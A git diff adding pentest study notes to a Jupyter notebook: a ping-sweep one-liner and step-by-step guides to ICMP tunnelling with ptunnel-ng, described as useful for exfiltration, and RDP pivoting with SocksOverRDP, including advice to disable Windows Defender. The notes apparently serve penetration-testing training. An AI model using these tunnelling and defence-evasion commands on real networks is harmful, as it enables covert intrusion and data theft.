--- a/hnetwork_notes.ipynb
+++ b/hnetwork_notes.ipynb
@@ -2244,6 +2244,8 @@
     "```powershell\n",
     "for /L %i in (1 1 254) do ping x.x.x.%i -n 1 -w 100 | find \"Reply\"      #cmd\n",
     "\n",
+    "for /L %i in (1,1,255) do @ping -n 1 -w 200 x.x.x.%i > nul && echo x.x.x.%i is up      #cmd\n",
+    "\n",
     "1..254 | % {\"172.16.5.$($_): $(Test-Connection -count 1 -comp 172.15.5.$($_) -quiet)\"}    #powershell\n",
     "\n",
     "```\n",
@@ -2639,13 +2641,73 @@
    "source": [
     "**<u>ICMP Tunneling with SOCKS</u>**\n",
     "\n",
+    "ICMP tunneling encapsulates traffic within ICMP packets containing echo requests and responses. ICMP tunneling only works when ping responses are permitted within a firewalled network. When a host within a firewalled network is allowed to ping an external server, it can encapsulate its traffic within the ping echo request and send it to an external server. The external server can validate this traffic and send an appropriate response, which ie useful for data exfiltration and creating pivot tunnels to an external server. \n",
     "\n",
+    "[ptunnel-ng](https://github.com/utoni/ptunnel-ng) can be used to create a tunnel between the initial pivot host and the attack host. Once a tunnel is created, it will be possible to proxy traffic through the ptunnel-ng client. \n",
     "\n",
+    "First, install and initialize the ptunnel-ng:\n",
+    "```bash\n",
+    "clone https://github.com/utoni/ptunnel-ng.git\n",
+    "sudo ./autogen.sh \n",
     "\n",
-    "<br>\n",
+    "```\n",
+    "After running the final script, ptunnel-ng can be used from the client and server-side.Everything will be available in `/ptunnel-ng/src` Transfer the repo from the attack host to the target host; once this is done, start the server-side of the ICMP tunnel on the pivot host with the following command:\n",
+    "```bash\n",
+    "scp -r ptunnel-ng username@x.x.x.x:~/\n",
     "\n",
+    "sudo ./ptunnel-ng -rx.x.x.x -R22       #done on pivot host; IP address is the one reachable from the attack host on the pivot host\n",
     "\n",
-    "**<u>RDP and SOCKS Tunneling (SocksOverRDP)</u>**"
+    "```\n",
+    "Based on the attack host, attempt to connect to the ptunnel-ng server with the following command, but ensure this happens through the local port 2222, as this port allows traffic to be sent through the ICMP tunnel:\n",
+    "```bash\n",
+    "sudo ./ptunnel-ng -px.x.x.x -l2222 -rx.x.x.x -R22     #done on attack host; both IP addresses are that of the pivot host in this case\n",
+    "\n",
+    "```\n",
+    "With the ptunnel-ng ICMP tunnel successfully established, attempt to connect to the target using SSH through local port 2222, as follows:\n",
+    "```bash\n",
+    "ssh -p2222 -lusername 127.0.0.1           #username is that of the pivot host\n",
+    "\n",
+    "```\n",
+    "If configured correctly, enter the credentials of the pivot host to get an SSH session all through the ICMP tunnel. On the client & server-side of the connection, ptunnel-ng gives session logs and traffic statistics associated with the traffic that passes through the ICMP tunnel. This is one way to confirm that the traffic is passing from client to server using ICMP. \n",
+    "\n",
+    "This tunnel and SSH can also be used to perform dynamic port forwarding to use proxychains in various ways:\n",
+    "```bash\n",
+    "ssh -D 9050 -p2222 -lusername 127.0.0.1         #username is that of the pivot host\n",
+    "\n",
+    "```\n",
+    "Proxychains can be used with nmap to scan targets on the internal network (172.16.5.x) connected to the pivot host. If the other device is found to be Windows, check to see if RDP is open or try other ports with the following flags:\n",
+    "```bash\n",
+    "proxychains nmap -sV -sT 172.16.5.19 -p3389\n",
+    "\n",
+    "```\n",
+    "**<u>RDP and SOCKS Tunneling (SocksOverRDP)</u>**\n",
+    "\n",
+    "If limited to a Windows network without access to SSH for pivoting, tools for Windows OSs would have to be used. [SocksOverROD](https://github.com/nccgroup/SocksOverRDP) uses Dynamic Virtual Channels (DVC) from the Remote Desktop Service feature of Windows. DVC is responsible for tunneling packets over the RDP connection; this feature allows clipboard data transfer, audio sharing, and tunneling arbitrary packets over the network. This tool can be used to tunnel custom packets and then proxy through it. [Proxifier](https://www.proxifier.com/) can be used as the proxy server. \n",
+    "\n",
+    "Start by downloading the appropriate binaries to the attack host to perform this attack. Having the binaries on the attack host will enable a transfer to each target where needed. The following binaries are needed:\n",
+    "* [SocksOverRDP x64 Binaries](https://github.com/nccgroup/SocksOverRDP/releases)\n",
+    "* [Proxifier Portable Binary](https://www.proxifier.com/download/#win-tab). Download ProxifierPE.zip\n",
+    "\n",
+    "Once these files are downloaded, load `SocksOverRDP.dll` using regsvr32.exe to the attack machine (if the attack machine is Windows; this can also be downloaded to the first pivot host). If this file .dll file deletes after download, turn off real-time protection and add **.dll** file exceptions from Windows Defender or `Uninstall-Windows-Feature -Name Windows-Defender`:\n",
+    "```powershell\n",
+    "Expand-Archive -Path \"SocksOverRDPx64.zip\"\n",
+    "\n",
+    "regsvr32.exe SocksOverRDP-Plugin.dll\n",
+    "\n",
+    "```\n",
+    "Now, connect to the pivot host (or the secondary pivot host depending on the context) using `mstsc.exe`; a prompt should be output that the SocksOverRDP plugin is enabled and listening on 127.0.0.1:1080. Transfer the SocksOverRDPx64.zip or the SocksOverRDP-Server.exe file to the pivot host, then start SocksOverRDP-Server.exe with Admin privileges. It should be clear whether the SOCKS listener is started, but to confirm it, type the following on the pivot host:\n",
+    "```powershell\n",
+    "netstat -antb | findstr 1080\n",
+    "\n",
+    "```\n",
+    "After starting the listener on the pivot host, use the Proxifier executable on the attack host and configure it to forward all the packets to 127.0.0.1:1080. Proxifier will route traffic through the given host and port: \n",
+    "1. Select the ProxifierPortable app\n",
+    "2. Profile > Proxy Server\n",
+    "3. Add IP address 127.0.0.1 and port 1080 with SOCKS5\n",
+    "\n",
+    "Once this is complete, start `mstsc.exe` on the attack host and connect to the target machine on a remote network. Enter the IP address of the remote server and the known credentials. Proxifier will route all the attack host's traffic via 127.0.0.1:1080, which will tunnel it over RDP to the pivot host (again, or the secondary pivot host depending on the context), which will then route it to the final target's network using SocksOverRDP-server.exe\n",
+    "\n",
+    ">It is important to note that when interacting with RDP sessions on an engagement, there may be slow performance in a given session, especially if there are multiple RDP sessions simultaneously. If this is the case, access the Experience tab in mstsc.exe and set Performance to Modem."
    ]
   },
   {
